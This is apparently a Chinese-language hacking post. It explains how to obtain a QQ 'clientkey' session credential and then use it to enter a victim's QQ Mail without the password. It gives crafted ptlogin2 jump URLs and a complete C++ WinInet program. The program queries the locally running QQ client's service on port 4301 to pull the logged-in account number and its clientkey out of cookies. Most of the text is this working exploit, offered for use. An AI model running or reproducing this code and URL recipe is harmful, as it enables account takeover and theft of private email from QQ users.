需要注意的是,這種方法獲取的clientkey長度是224位,和之前注入dll獲取的不一樣。
注入dll獲取的是64位的clientkey
利用方法:
64字節: http://ptlogin2.qq.com/jump?ptlang=2052&clientuin=QQ號碼&clientkey=64個字節的KEY&u1=需要登陸的QQ服務網站地址
224字節: http://ptlogin2.qq.com/jump?clientuin=QQ號&clientkey=224位字節的KEY&keyindex=9&u1=需要登陸的QQ服務網站地址
例如,我想利用224字節的key,無密進入qq郵箱
用瀏覽器訪問下面構造的地址,成功後會返回一個地址,複製再訪問,就直接進入QQ郵箱了
http://ptlogin2.qq.com/jump?clientuin=QQ號&clientkey=224字節key&keyindex=9&u1=https%3A%2F%2Fmail.qq.com%2Fcgi-bin%2Flogin%3Fvt%3Dpassport%26vm%3Dwpt%26ft%3Dloginpage%26target%3D&pt_local_tk=&pt_3rd_aid=0&ptopt=1&style=25
#include "stdafx.h"
#include<string>
#include<windows.h>
#include<iostream>
#include <WinInet.h>
#pragma comment(lib,"wininet.lib")
using namespace std;
char URL_STRING[] = "https://xui.ptlogin2.qq.com/cgi-bin/xlogin?appid=636014201&s_url=http://www.qq.com/qq2012/loginSuccess.htm&style=20&border_radius=1&target=self&maskOpacity=40";
int _tmain(int argc, _TCHAR* argv[])
{
// 初始化URL
URL_COMPONENTSA crackedURL = { 0 };
char szHostName[128];
char szUrlPath[256];
crackedURL.dwStructSize = sizeof(URL_COMPONENTSA);
crackedURL.lpszHostName = szHostName;
crackedURL.dwHostNameLength = ARRAYSIZE(szHostName);
crackedURL.lpszUrlPath = szUrlPath;
crackedURL.dwUrlPathLength = ARRAYSIZE(szUrlPath);
InternetCrackUrlA(URL_STRING, (DWORD)strlen(URL_STRING), 0, &crackedURL);
// 初始化會話
HINTERNET hInternet = InternetOpenA("Microsoft Internet Explorer", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);
HINTERNET hHttpSession = InternetConnectA(hInternet, crackedURL.lpszHostName, INTERNET_DEFAULT_HTTPS_PORT, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);
HINTERNET hHttpRequest = HttpOpenRequestA(hHttpSession, "GET", crackedURL.lpszUrlPath, NULL, "", NULL, INTERNET_FLAG_SECURE, 0);
// 發送HTTP請求
HttpSendRequest(hHttpRequest, NULL, 0, NULL, 0);
// 查詢HTTP請求狀態
DWORD dwRetCode = 0;
DWORD dwSizeOfRq = sizeof(DWORD);
BOOL bRet = FALSE;
bRet = HttpQueryInfo(hHttpRequest, HTTP_QUERY_STATUS_CODE | HTTP_QUERY_FLAG_NUMBER, &dwRetCode, &dwSizeOfRq, NULL);
// 讀取整個Headers
char lpHeaderBuffer[1024] = {0};
dwSizeOfRq = 1024;
bRet = HttpQueryInfo(hHttpRequest, HTTP_QUERY_RAW_HEADERS, lpHeaderBuffer, &dwSizeOfRq, NULL);
// 從Cookie中提取pt_local_token的值
char* pt_local_token = lpHeaderBuffer + dwSizeOfRq;
while (pt_local_token != lpHeaderBuffer)
{
if (strstr(pt_local_token, "pt_local_token="))
{
// 退出之前,修正偏移
pt_local_token += sizeof("pt_local_token");
char* pEndBuffer = strstr(pt_local_token, ";");
*pEndBuffer = 0;
break;
}
pt_local_token--;
}
// 關閉句柄,只需要釋放下面兩個,注意關閉時按相反的順序
InternetCloseHandle(hHttpRequest);
InternetCloseHandle(hHttpSession);
/* 第二次建立會話 */
// 初始化URL參數
char lpszUrlPath[MAX_PATH] = "/pt_get_uins?callback=ptui_getuins_CB&pt_local_tk=";
strcat(lpszUrlPath, pt_local_token); // url末尾追加pt_local_token
// 初始化會話
hHttpSession = InternetConnectA(hInternet, "localhost.ptlogin2.qq.com", 4301, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);
hHttpRequest = HttpOpenRequestA(hHttpSession, "GET", lpszUrlPath, NULL, "", NULL, INTERNET_FLAG_SECURE, 0);
// 發送HTTP請求,添加頭信息
char* lpHeaders = "Referer:https://xui.ptlogin2.qq.com/cgi-bin/xlogin?appid=636014201&s_url=http%3A%2F%2Fwww.qq.com%2Fqq2012%2FloginSuccess.htm";
HttpSendRequestA(hHttpRequest, lpHeaders, strlen(lpHeaders), NULL, 0);
// 查詢HTTP請求狀態
dwRetCode = 0;
dwSizeOfRq = sizeof(DWORD);
bRet = HttpQueryInfo(hHttpRequest, HTTP_QUERY_STATUS_CODE | HTTP_QUERY_FLAG_NUMBER, &dwRetCode, &dwSizeOfRq, NULL);
// 獲取返回數據的大小
DWORD dwNumberOfBytesAvailable = 0;
bRet = InternetQueryDataAvailable(hHttpRequest, &dwNumberOfBytesAvailable, NULL, NULL);
// 讀取網頁內容
char* lpBuffer = new char[dwNumberOfBytesAvailable]();
bRet = InternetReadFile(hHttpRequest, lpBuffer, dwNumberOfBytesAvailable, &dwNumberOfBytesAvailable);
// 從內容中提取已登陸QQ賬號,是個js數組,這裏只提取第一個
char* uin = lpBuffer + dwNumberOfBytesAvailable;
while (uin != lpBuffer)
{
if (strstr(uin, "\"account\":\""))
{
// 退出之前,修正偏移
uin += sizeof("\"account\":");
char* pEndBuffer = strstr(uin, "\"");
*pEndBuffer = 0;
break;
}
uin--;
}
cout << "[+] uin:" << uin << endl;
// 釋放資源,注意關閉句柄時按相反的順序
InternetCloseHandle(hHttpRequest);
InternetCloseHandle(hHttpSession);
/* 第三次會話 */
// 初始化URL參數
ZeroMemory(lpszUrlPath,MAX_PATH);
strcat(lpszUrlPath, "/pt_get_st?clientuin=");
strcat(lpszUrlPath, uin);
strcat(lpszUrlPath, "&callback=ptui_getst_CB&pt_local_tk=");
strcat(lpszUrlPath, pt_local_token);
// 發送HTTPS請求
hHttpSession = InternetConnectA(hInternet, "localhost.ptlogin2.qq.com", 4301, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);
hHttpRequest = HttpOpenRequestA(hHttpSession, "GET", lpszUrlPath, NULL, "", NULL, INTERNET_FLAG_SECURE, 0);
// 添加頭信息
lpHeaders = "Referer:https://xui.ptlogin2.qq.com/cgi-bin/xlogin?appid=636014201&s_url=http%3A%2F%2Fwww.qq.com%2Fqq2012%2FloginSuccess.htm";
HttpSendRequestA(hHttpRequest, lpHeaders, strlen(lpHeaders), NULL, 0);
// 查詢HTTP請求狀態
dwRetCode = 0;
dwSizeOfRq = sizeof(DWORD);
bRet = HttpQueryInfoA(hHttpRequest, HTTP_QUERY_STATUS_CODE | HTTP_QUERY_FLAG_NUMBER, &dwRetCode, &dwSizeOfRq, NULL);
// 讀取整個Headers
ZeroMemory(lpHeaderBuffer, 1024);
dwSizeOfRq = 1024;
bRet = HttpQueryInfoA(hHttpRequest, HTTP_QUERY_RAW_HEADERS, lpHeaderBuffer, &dwSizeOfRq, NULL);
// 從Cookie中提取ClientKey的值
char* clientkey = lpHeaderBuffer + dwSizeOfRq;
while (clientkey != lpHeaderBuffer)
{
if (strstr(clientkey, "clientkey="))
{
// 退出之前,修正偏移
clientkey += sizeof("clientkey");
char* pEndBuffer = strstr(clientkey, ";");
*pEndBuffer = 0;
break;
}
clientkey--;
}
cout << "[+] client key:" << clientkey << endl;
InternetCloseHandle(hHttpRequest);
InternetCloseHandle(hHttpSession);
InternetCloseHandle(hInternet);
delete[] lpBuffer;
return 0;
}
